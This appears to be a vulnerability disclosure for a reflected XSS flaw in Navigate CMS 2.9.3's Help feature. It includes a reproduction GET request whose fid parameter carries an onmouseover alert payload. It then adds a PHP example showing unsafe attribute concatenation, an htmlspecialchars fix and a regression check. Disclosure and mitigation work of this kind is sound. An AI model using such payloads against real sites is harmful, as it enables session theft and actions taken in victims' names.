EXPECTED BEHAVIOUR
An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the Help feature.
IMPACT
Impacts commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.
VULNERABILITY CODE
I found that the vulnerable code is in \lib\layout\layout.class.php
STEPS TO REPRODUCE
We change the request:
GET /navigate-2.9.3r1525/navigate/navigate.php?fid=%22onmouseover%3d%22alert(%27xss%27)%22%3b%22&act=edit&id=&tab=0&tab_language=&form-sent=true&id=&date_to_display=2021-06-04+01%3a27&date_published=&date_unpublish=&access=0&permission=0&item-author=1&item-author-text=admin&association[]=category&category=&embedding[]=1&template=content
Log into your account
Then, when a user moves the cursor over the Help feature, the reflected XSS is executed (no click is needed).
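The report does not show the affected code in layout.class.php, so the following added example (not Navigate CMS code) uses a hypothetical help-link template to show why the decoded fid value leaves a quoted attribute and how attribute-context encoding with htmlspecialchars keeps it inside. The function names and the link markup are assumptions; the fid value is the one from the request above.

```php
<?php
// Added example: hypothetical helpers, not code from Navigate CMS.

// Constructed stand-in for a help link that reflects `fid` into an attribute.
function help_link_unsafe(string $fid): string
{
    // Raw concatenation: a double quote inside $fid closes the href value early,
    // so whatever follows is parsed as new attributes on the same element.
    return '<a class="help" href="help.php?fid=' . $fid . '">Help</a>';
}

function help_link_safe(string $fid): string
{
    // Attribute-context encoding: ENT_QUOTES encodes both " and ',
    // so the value cannot terminate the quoted attribute.
    $encoded = htmlspecialchars($fid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a class="help" href="help.php?fid=' . $encoded . '">Help</a>';
}

// Regression check: the template itself contains exactly four double quotes
// (two attributes). Any extra quote means user input changed the markup.
function breaks_out_of_attribute(string $html): bool
{
    return substr_count($html, '"') !== 4;
}

// fid copied from the request in the report, decoded the way PHP fills $_GET.
$fid = urldecode('%22onmouseover%3d%22alert(%27xss%27)%22%3b%22');

foreach (['unsafe' => help_link_unsafe($fid), 'safe' => help_link_safe($fid)] as $name => $html) {
    printf(
        "%-6s breakout=%s\n       %s\n",
        $name,
        breaks_out_of_attribute($html) ? 'yes' : 'no',
        $html
    );
}
```

The same quote-count check can be kept as a unit test for any template that reflects request parameters into quoted attributes.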